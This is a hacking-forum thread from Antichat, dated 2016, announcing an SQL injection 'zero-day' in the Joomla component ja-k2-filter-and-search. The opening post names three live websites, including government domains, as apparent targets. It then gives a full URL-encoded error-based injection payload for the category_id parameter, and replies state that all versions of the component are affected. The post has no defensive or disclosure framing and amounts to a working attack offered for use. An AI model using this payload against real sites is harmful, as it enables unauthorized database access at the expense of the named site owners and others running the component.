HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.10.2016, 01:42
sTz
Новичок
Регистрация: 20.10.2016
Сообщений: 1
Провел на форуме:
385

Репутация: 0
По умолчанию
http://sherdoust.ir/

http://www.arhitektura.mrt.gov.me/

http://www.cmvcapanema.pr.gov.br/

(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c 1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2 cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHA R(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)% 2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%2 01%20union%20select%202)a%20group%20by%20x%20limit %201))&Itemid=135&option=com_jak2filter&searchword =the&view=itemlist&xf_2=5%27

As a result, the following error message is displayed proving the presence of vulnerability.
 
Ответить с цитированием

  #2  
Старый 23.10.2016, 11:46
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
Это под какую версию?
 
Ответить с цитированием

  #3  
Старый 23.10.2016, 15:20
androd
Новичок
Регистрация: 16.09.2016
Сообщений: 17
Провел на форуме:
5429

Репутация: 2
По умолчанию
Цитата:
Сообщение от brown  

Это под какую версию?
Плагин

ja-k2-filter-and-search все версии
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.